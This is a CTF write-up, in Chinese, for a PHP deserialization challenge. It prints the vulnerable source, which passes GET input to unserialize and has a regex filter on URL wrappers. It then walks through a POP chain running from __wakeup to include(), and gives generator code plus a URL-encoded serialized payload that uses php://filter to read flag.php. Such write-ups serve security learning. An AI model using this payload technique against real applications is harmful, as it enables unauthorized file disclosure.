先放原始碼
點選檢視程式碼
Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}
先補充幾個題目用到的魔術方法觸發條件
__construct()//當一個物件建立時被呼叫
__toString() //當一個物件被當作一個字串使用
__wakeup()//將在反序列化之後立即被呼叫
__get()//獲取一個類的私有屬性,或者獲取一個類併為定義的屬性時會被呼叫
__invoke()//呼叫函式的方式呼叫一個物件時的回應方法
這裡主要講解通讀程式碼後的解題思路,不對類中具體函式引數做說明
想要弄清利用鏈必須逆向思維,題目入手點很明顯的Modifier類中的append方法,該方法會包含Modifier類中var屬性,所以$var=flag.php這裡很清晰,append方法又被魔術方法__invoke呼叫,也就是說Modifier這個類必須得被當作函式執行,發現Test類中__get魔術方法會呼叫變數p作為函式使用,所以$p=一個Modifier類,那麼想呼叫__get方法只有獲取Test類中不存在的屬性才會觸發,我們注意到show類中的方法__tostring中的返回this->str->source,這裡很明顯是個提示,str屬性一定是個類(),所以我們讓str=一個Test類,在訪問test->source時source不存在與類Test中就會觸發_get函式,那麼最後一步就是確認如何觸發_toString函式,看__wakeup魔術方法,這個方法將source進行正則比較,如果source不是字串就會呼叫__toString方法將其轉換為字串進行比較,所以為了既能呼叫_toString函式又能使str=一個Test類,我們讓source=new show(),注意_toString函式里的this 應該是this->source,因為是this->source需要做處理而呼叫的__toString函式,這樣利用鏈就完成了,我們在正向梳理一下
__wakeup()-->__toString()-->__get-->__invoke-->append
程式碼如下:
點選檢視程式碼
<?php
class Modifier {
protected $var="php://filter/read=convert.base64-encode/resource=flag.php";
}
class Show{
public $source;
public $str;
}
class Test{
public $p;
}
$a =new Modifier();
$b = new Show();
$b->source=new Show();
$b->source->str=new Test();
$b->source->str->p=$a;
echo urlencode(serialize($b));
payload:
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D
base64解碼即可獲取答案